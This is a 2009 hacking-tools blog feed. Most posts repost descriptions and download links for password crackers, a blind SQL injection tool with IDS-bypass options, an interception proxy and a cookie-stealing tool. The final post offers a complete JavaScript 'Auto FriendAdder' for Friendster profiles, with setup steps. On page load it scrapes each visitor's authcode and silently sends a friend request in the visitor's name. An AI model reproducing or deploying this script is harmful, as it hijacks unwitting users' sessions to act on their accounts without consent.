src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-2116931520835517477</id><published>2009-01-03T02:06:00.000-08:00</published><updated>2009-01-03T04:40:16.548-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><category scheme='http://www.blogger.com/atom/ns#' term='password cracking'/><title type='text'>Brutus Password Cracker-Download brutus-aet2.zip AET2</title><content type='html'>Brutus Password Cracker - Download brutus-aet2.zip AET2&lt;br /&gt;&lt;br /&gt;A lot of people come to Darknet looking for Brutus AET2 (brutus-aet2.zip) to download, but unfortunately due to some stupid Homeland security bullshit I actually had to remove the file or risk having no hosting left..&lt;br /&gt;&lt;br /&gt;If you don’t know, Brutus is one of the fastest, most flexible remote password crackers you can get your hands on - it’s also free. It is available for Windows 9x, NT and 2000, there is no UN*X version available although it is a possibility at some point in the future. Brutus was first made publicly available in October 1998 and since that time there have been at least 70,000 downloads and over 175,000 visitors to this page. Development continues so new releases will be available in the near future.&lt;br /&gt;&lt;br /&gt;Brutus was written originally to help me check routers etc. for default and common passwords.&lt;br /&gt;&lt;br /&gt;Features&lt;br /&gt;&lt;br /&gt;Brutus version AET2 is the current release and includes the following authentication types :&lt;br /&gt;&lt;br /&gt;    * HTTP (Basic Authentication)&lt;br /&gt;    * HTTP (HTML Form/CGI)&lt;br /&gt;    * POP3&lt;br /&gt;    * FTP&lt;br /&gt;    * SMB&lt;br /&gt;    * Telnet&lt;br /&gt;&lt;br /&gt;Other types such as IMAP, NNTP, NetBus etc are freely downloadable from this site and simply imported into your copy of Brutus. You can create your own types or use other peoples.&lt;br /&gt;&lt;br /&gt;The current release includes the following functionality :&lt;br /&gt;&lt;br /&gt;    * Multi-stage authentication engine&lt;br /&gt;    * 60 simultaneous target connections&lt;br /&gt;    * No username, single username and multiple username modes&lt;br /&gt;    * Password list, combo (user/password) list and configurable brute force modes&lt;br /&gt;    * Highly customisable authentication sequences&lt;br /&gt;    * Load and resume position&lt;br /&gt;    * Import and Export custom authentication types as BAD files seamlessly&lt;br /&gt;    * SOCKS proxy support for all authentication types&lt;br /&gt;    * User and password list generation and manipulation functionality&lt;br /&gt;    * HTML Form interpretation for HTML Form/CGI authentication types&lt;br /&gt;    * Error handling and recovery capability inc. resume after crash/failure.&lt;br /&gt;&lt;br /&gt;You can download it here:&lt;br /&gt;&lt;a href="http://www.hoobie.net/brutus/brutus-download.html"&gt;Brutus AET2&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;from darknet&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-2116931520835517477?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/2116931520835517477/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/brutus-password-cracker-download-brutus.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/2116931520835517477'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/2116931520835517477'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/brutus-password-cracker-download-brutus.html' title='Brutus Password Cracker-Download brutus-aet2.zip AET2'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-5111180542514703842</id><published>2009-01-03T01:58:00.000-08:00</published><updated>2009-01-03T04:40:43.401-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Top Tools'/><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><title type='text'>Top 15 Security/Hacking Tools &amp; Utilities</title><content type='html'>Top 15 Security/Hacking Tools &amp; Utilities&lt;br /&gt;&lt;br /&gt;1. Nmap&lt;br /&gt;&lt;br /&gt;I think everyone has heard of this one, recently evolved into the 4.x series.&lt;br /&gt;&lt;br /&gt;Nmap (”Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.&lt;br /&gt;&lt;br /&gt;Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.insecure.org/nmap/download.html"&gt;Get Nmap Here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;2. Nessus Remote Security Scanner&lt;br /&gt;&lt;br /&gt;Recently went closed source, but is still essentially free. Works with a client-server framework.&lt;br /&gt;&lt;br /&gt;Nessus is the world’s most popular vulnerability scanner used in over 75,000 organizations world-wide. Many of the world’s largest organizations are realizing significant cost savings by using Nessus to audit business-critical enterprise devices and applications.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.nessus.org/download/"&gt;Get Nessus Here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;3. John the Ripper&lt;br /&gt;&lt;br /&gt;Yes, JTR 1.7 was recently released!&lt;br /&gt;&lt;br /&gt;John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the box are Kerberos AFS and Windows NT/2000/XP/2003 LM hashes, plus several more with contributed patches.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.openwall.com/john/"&gt;You can get JTR Here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;4. Nikto&lt;br /&gt;&lt;br /&gt;Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions on over 625 servers, and version specific problems on over 230 servers. Scan items and plugins are frequently updated and can be automatically updated (if desired).&lt;br /&gt;&lt;br /&gt;Nikto is a good CGI scanner, there are some other tools that go well with Nikto (focus on http fingerprinting or Google hacking/info gathering etc, another article for just those).&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.cirt.net/code/nikto.shtml"&gt;Get Nikto Here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;5. SuperScan&lt;br /&gt;&lt;br /&gt;Powerful TCP port scanner, pinger, resolver. SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.&lt;br /&gt;&lt;br /&gt;If you need an alternative for nmap on Windows with a decent interface, I suggest you check this out, it’s pretty nice.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.foundstone.com/index.htm?subnav=resources/navigation.htm&amp;subcontent=/resources/proddesc/superscan4.htm"&gt;Get SuperScan Here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;6. p0f&lt;br /&gt;&lt;br /&gt;P0f v2 is a versatile passive OS fingerprinting tool. P0f can identify the operating system on:&lt;br /&gt;&lt;br /&gt;- machines that connect to your box (SYN mode),&lt;br /&gt;- machines you connect to (SYN+ACK mode),&lt;br /&gt;- machine you cannot connect to (RST+ mode),&lt;br /&gt;- machines whose communications you can observe.&lt;br /&gt;&lt;br /&gt;Basically it can fingerprint anything, just by listening, it doesn’t make ANY active connections to the target machine.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://lcamtuf.coredump.cx/p0f/p0f.shtml"&gt;Get p0f Here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;7. Wireshark (Formely Ethereal)&lt;br /&gt;&lt;br /&gt;Wireshark is a GTK+-based network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. The goal of the project is to create a commercial-quality analyzer for Unix and to give Wireshark features that are missing from closed-source sniffers.&lt;br /&gt;&lt;br /&gt;Works great on both Linux and Windows (with a GUI), easy to use and can reconstruct TCP/IP Streams! Will do a tutorial on Wireshark later.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.wireshark.org/"&gt;Get Wireshark Here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;8. Yersinia&lt;br /&gt;&lt;br /&gt;Yersinia is a network tool designed to take advantage of some weakeness in different Layer 2 protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems. Currently, the following network protocols are implemented: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), IEEE 802.1q, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).&lt;br /&gt;&lt;br /&gt;The best Layer 2 kit there is.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://yersinia.sourceforge.net/"&gt;Get Yersinia Here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;9. Eraser&lt;br /&gt;&lt;br /&gt;Eraser is an advanced security tool (for Windows), which allows you to completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Works with Windows 95, 98, ME, NT, 2000, XP and DOS. Eraser is Free software and its source code is released under GNU General Public License.&lt;br /&gt;&lt;br /&gt;An excellent tool for keeping your data really safe, if you’ve deleted it..make sure it’s really gone, you don’t want it hanging around to bite you in the ass.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.heidi.ie/eraser/download.php"&gt;Get Eraser Here.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;10. PuTTY&lt;br /&gt;&lt;br /&gt;PuTTY is a free implementation of Telnet and SSH for Win32 and Unix platforms, along with an xterm terminal emulator. A must have for any h4×0r wanting to telnet or SSH from Windows without having to use the crappy default MS command line clients.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.chiark.greenend.org.uk/~sgtatham/putty/"&gt;Get PuTTY Here.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;11. LCP&lt;br /&gt;&lt;br /&gt;Main purpose of LCP program is user account passwords auditing and recovery in Windows NT/2000/XP/2003. Accounts information import, Passwords recovery, Brute force session distribution, Hashes computing.&lt;br /&gt;&lt;br /&gt;A good free alternative to L0phtcrack.&lt;br /&gt;&lt;br /&gt;LCP was briefly mentioned in our well read Rainbow Tables and RainbowCrack article.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.lcpsoft.com/english/download.htm"&gt;Get LCP Here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;12. Cain and Abel&lt;br /&gt;&lt;br /&gt;My personal favourite for password cracking of any kind.&lt;br /&gt;&lt;br /&gt;Cain &amp; Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.oxid.it/cain.html"&gt;Get Cain and Abel Here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;13. Kismet&lt;br /&gt;&lt;br /&gt;Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic.&lt;br /&gt;&lt;br /&gt;A good wireless tool as long as your card supports rfmon (look for an orinocco gold).&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.kismetwireless.net/download.shtml"&gt;Get Kismet Here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;14. NetStumbler&lt;br /&gt;&lt;br /&gt;Yes a decent wireless tool for Windows! Sadly not as powerful as it’s Linux counterparts, but it’s easy to use and has a nice interface, good for the basics of war-driving.&lt;br /&gt;&lt;br /&gt;NetStumbler is a tool for Windows that allows you to detect Wireless Local Area Networks (WLANs) using 802.11b, 802.11a and 802.11g. It has many uses:&lt;br /&gt;&lt;br /&gt;    * Verify that your network is set up the way you intended.&lt;br /&gt;    * Find locations with poor coverage in your WLAN.&lt;br /&gt;    * Detect other networks that may be causing interference on your network.&lt;br /&gt;    * Detect unauthorized “rogue” access points in your workplace.&lt;br /&gt;    * Help aim directional antennas for long-haul WLAN links.&lt;br /&gt;    * Use it recreationally for WarDriving.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.stumbler.net/"&gt;Get NetStumbler Here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;15. hping&lt;br /&gt;&lt;br /&gt;To finish off, something a little more advanced if you want to test your TCP/IP packet monkey skills.&lt;br /&gt;&lt;br /&gt;hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping unix command, but hping isn’t only able to send ICMP echo requests. It supports TCP, UDP, ICMP and RAW-IP protocols, has a traceroute mode, the ability to send files between a covered channel, and many other features.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.hping.org/"&gt;Get hping Here&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Yah I’ve stayed away from commercial products in this article, perhaps I’ll cover those another day.&lt;br /&gt;&lt;br /&gt;from darknet&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-5111180542514703842?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/5111180542514703842/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/top-15-securityhacking-tools-utilities.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/5111180542514703842'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/5111180542514703842'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/top-15-securityhacking-tools-utilities.html' title='Top 15 Security/Hacking Tools &amp; Utilities'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-461860409267215521</id><published>2009-01-03T01:57:00.001-08:00</published><updated>2009-01-03T04:42:26.072-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='SQL'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><title type='text'>bsqlbf 1.1 - Blind SQL Injection Tool</title><content type='html'>bsqlbf 1.1 - Blind SQL Injection Tool&lt;br /&gt;bsqlbf is a tool for Blind SQL Injection attacks, a pretty nifty one too!&lt;br /&gt;&lt;br /&gt;The author says there are similar tools about, but he’s tried to combine all the techniques into one compact but complete tool.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;bsqlbf 1.1&lt;br /&gt;&lt;br /&gt;# CHANGELOG:&lt;br /&gt;# -get now support resume (with -start option)&lt;br /&gt;# -get to fetch files (thank you ilo AGAIN)&lt;br /&gt;# + -time option added (IDS bypass)&lt;br /&gt;# + -rtime option added (IDS bypass)&lt;br /&gt;# + -rproxy option added (IDS bypass)&lt;br /&gt;# + -ruagent option added (IDS bypass)&lt;br /&gt;&lt;br /&gt;There is a decent GUI front end in Perl-Tk made by Gandalfj, a Windows version is available for download too.&lt;br /&gt;&lt;br /&gt;You can download bsqlbf 1.1 &lt;a href="http://www.unsec.net/download/bsqlbf.pl"&gt;here&lt;/a&gt; (Original page in Spanish).&lt;br /&gt;from darknet&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-461860409267215521?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/461860409267215521/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/bsqlbf-11-blind-sql-injection-tool.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/461860409267215521'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/461860409267215521'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/bsqlbf-11-blind-sql-injection-tool.html' title='bsqlbf 1.1 - Blind SQL Injection Tool'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-2908122608718554352</id><published>2009-01-03T01:55:00.000-08:00</published><updated>2009-01-03T04:42:16.360-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><category scheme='http://www.blogger.com/atom/ns#' term='proxy'/><title type='text'>Paros Proxy 3.2.10 Released - MITM HTTP and HTTPS Proxy</title><content type='html'>Paros Proxy 3.2.10 Released - MITM HTTP and HTTPS Proxy&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;One of my favourite proxy options, along side the Burp Proxy (evolved into Burp Suite).&lt;br /&gt;&lt;br /&gt;I’ll definately talk more about the Burp Suite later as it’s excellent for testing anything web-based.&lt;br /&gt;&lt;br /&gt;Paros labels itself as MITM Proxy + Spider + Scanner plus anything else you want it to be, it is a pretty neat piece of software.&lt;br /&gt;&lt;br /&gt;It’s particularly useful for testing web applications and things such as insecure sessions.&lt;br /&gt;&lt;br /&gt;Paros is free of charge and completely written in Java. Through Paros’s proxy nature, all HTTP and HTTPS data between server and client, including cookies and form fields, can be intercepted and modified.&lt;br /&gt;&lt;br /&gt;These proxies have a different purpose than those personal type proxies like&lt;a href="http://www.proxomitron.info/files/index.html"&gt; Proxomitron &lt;/a&gt;which are intended to protect you, clean adverts, block spyware and so on. Proxies like Paros and Burp are meant for examining the security of applications and web application auditing.&lt;br /&gt;&lt;br /&gt;You do need Java Run Time Enviroment (JRE) 1.4 (or above) to install Paros.&lt;br /&gt;&lt;br /&gt;You can download the latest version of &lt;a href="http://sourceforge.net/project/showfiles.php?group_id=84378"&gt;Paros Here&lt;/a&gt;.&lt;br /&gt;from darknet&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-2908122608718554352?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/2908122608718554352/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/paros-proxy-3210-released-mitm-http-and.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/2908122608718554352'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/2908122608718554352'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/paros-proxy-3210-released-mitm-http-and.html' title='Paros Proxy 3.2.10 Released - MITM HTTP and HTTPS Proxy'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-756951272145425874</id><published>2009-01-03T01:51:00.000-08:00</published><updated>2009-01-03T04:42:01.838-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='hack tools'/><category scheme='http://www.blogger.com/atom/ns#' term='surfing'/><category scheme='http://www.blogger.com/atom/ns#' term='downloadable'/><title type='text'>Surf Jack - Cookie Session Stealing Tool</title><content type='html'>Surf Jack - Cookie Session Stealing Tool&lt;br /&gt;&lt;br /&gt;A tool which allows one to hijack HTTP connections to steal cookies - even ones on HTTPS sites! Works on both Wifi (monitor mode) and Ethernet.&lt;br /&gt;&lt;br /&gt;Features:&lt;br /&gt;&lt;br /&gt;    * Does Wireless injection when the NIC is in monitor mode&lt;br /&gt;    * Supports Ethernet&lt;br /&gt;    * Support for WEP (when the NIC is in monitor mode)&lt;br /&gt;&lt;br /&gt;Known issues:&lt;br /&gt;&lt;br /&gt;    * Sometimes the victim is not redirected correctly (particularly seen when targeting Gmail)&lt;br /&gt;    * Cannot stop the tool via a simple Control^C. This is a problem with the proxy&lt;br /&gt;&lt;br /&gt;Requires:&lt;br /&gt;&lt;br /&gt;    * Python 2.4&lt;br /&gt;    * Scapy&lt;br /&gt;&lt;br /&gt;You can download Surf Jack here:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://surfjack.googlecode.com/files/surfjack-0.2b.zip"&gt;SurfJack&lt;/a&gt;&lt;br /&gt;from darknet&lt;br /&gt;Or read more &lt;a href="http://code.google.com/p/surfjack/"&gt;here&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-756951272145425874?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/756951272145425874/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/surf-jack-cookie-session-stealing-tool.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/756951272145425874'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/756951272145425874'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/surf-jack-cookie-session-stealing-tool.html' title='Surf Jack - Cookie Session Stealing Tool'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-4869626241161282656</id><published>2009-01-01T20:12:00.000-08:00</published><updated>2009-01-03T04:44:45.631-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tips and tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='google'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><category scheme='http://www.blogger.com/atom/ns#' term='codes'/><title type='text'>Google Trick .Image Flying Codes</title><content type='html'>Go to Code:&lt;br /&gt;Code:&lt;br /&gt;http://www.google.com&lt;br /&gt;2. Click "images"&lt;br /&gt;3. Fill in "bikes, flowers, cars" or any other word.&lt;br /&gt;4. You will get a page with alot of images thumbnailed.&lt;br /&gt;5. Now delete the URL on the addressbar (example:&lt;br /&gt;&lt;br /&gt;1. javascript:R= 0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI= document.images ; DIL=DI.length; function A(){for(i=0; igl&lt;DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=Math.sin(R*x1+i*x2+x3)*x4+x5; DIS.top=Math.cos(R*y1+i*y2+y3)*y4+y5}R++}setInterval('A()',5); void(0)&lt;br /&gt;&lt;br /&gt;4. javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',50); void(0);&lt;br /&gt;&lt;br /&gt;5. javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*1+i*x2+x3)*x1+x2)+"px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+"px"}R++}setInterval('A()',50); void(0);YeyeYeye    &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Copy the code and paste on address bar then hit enter and enjoy its &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-4869626241161282656?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/4869626241161282656/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/google-trick-image-flying-codes.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/4869626241161282656'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/490879771157898023/posts/default/4869626241161282656'/><link rel='alternate' type='text/html' href='http://holly-donuts.blogspot.com/2009/01/google-trick-image-flying-codes.html' title='Google Trick .Image Flying Codes'/><author><name>JonKawshin</name><uri>http://www.blogger.com/profile/18149838412664278671</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-490879771157898023.post-159376121208436046</id><published>2008-12-30T05:49:00.000-08:00</published><updated>2009-01-03T04:45:02.674-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tips and tricks'/><category scheme='http://www.blogger.com/atom/ns#' term='Learning'/><category scheme='http://www.blogger.com/atom/ns#' term='Friendster'/><category scheme='http://www.blogger.com/atom/ns#' term='hack'/><title type='text'>Friendster Auto FriendAdder!!</title><content type='html'>Friendster Auto FriendAdder!!&lt;br /&gt;&lt;br /&gt;This code will make the viewer automatically make a friend request to the profile with this code without him/her knowing it.&lt;br /&gt;&lt;br /&gt;Code:&lt;br /&gt;Code:&lt;br /&gt;&lt;br /&gt;var afaimg = document.createElement('span');&lt;br /&gt;afaimg.id = "addme";&lt;br /&gt;document.getElementsByTagName('head')[0].appendChild(afaimg);&lt;br /&gt;&lt;br /&gt;function afa() {&lt;br /&gt;var eadd = "PUT YOUR FRIENDSTER ACCOUNTS E-MAIL ADDRESS HERE";&lt;br /&gt;var k = document.getElementById("controlPanelButtons").innerHTML;&lt;br /&gt;var a = k.slice(k.indexOf("authcode="));&lt;br /&gt;var m = a.slice(9,39);&lt;br /&gt;document.getElementById("addme").innerHTML = "&lt;img src=\"http://www.friendster.com/addfriendrequest.php?authcode="+m+"&amp;uid="+pageOwnerID+"&amp;email="+eadd+"&amp;firstname=&amp;lastname=&amp;friend=&amp;submit=1\" width=\"0\" height=\"0\" /&gt;";&lt;br /&gt;}&lt;br /&gt;if (!attachOnLoadHandler(function() { afa();})) window.onload = function() { afa();};&lt;br /&gt;&lt;br /&gt;Replace PUT YOUR FRIENDSTER ACCOUNTS E-MAIL ADDRESS HERE with your Friendster account e-mail address.&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;&lt;br /&gt;    var afaimg = document.createElement('span');&lt;br /&gt;    afaimg.id = "addme";&lt;br /&gt;    document.getElementsByTagName('head')[0].appendChild(afaimg);&lt;br /&gt;&lt;br /&gt;    function afa() {&lt;br /&gt;    var eadd = "testing@domain.com";&lt;br /&gt;    var k = document.getElementById("controlPanelButtons").innerHTML;&lt;br /&gt;    var a = k.slice(k.indexOf("authcode="));&lt;br /&gt;    var m = a.slice(9,39);&lt;br /&gt;    document.getElementById("addme").innerHTML = "&lt;img src=\"http://www.friendster.com/addfriendrequest.php?authcode="+m+"&amp;uid="+pageOwnerID+"&amp;email="+eadd+"&amp;firstname=&amp;lastname=&amp;friend=&amp;submit=1\" width=\"0\" height=\"0\" /&gt;";&lt;br /&gt;    }&lt;br /&gt;    if (!attachOnLoadHandler(function() { afa();})) window.onload = function() { afa();};&lt;br /&gt;&lt;br /&gt;This is a .js script.&lt;br /&gt;&lt;br /&gt;Go HERE for instructions on how to make a .js file and upload it to a host.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/490879771157898023-159376121208436046?l=holly-donuts.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://holly-donuts.blogspot.com/feeds/159376121208436046/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://holly-donuts.blogspot.com/2008/12/friendster-auto-friendadder.html#comment-form' title='0 Comments'/><link rel='edit' 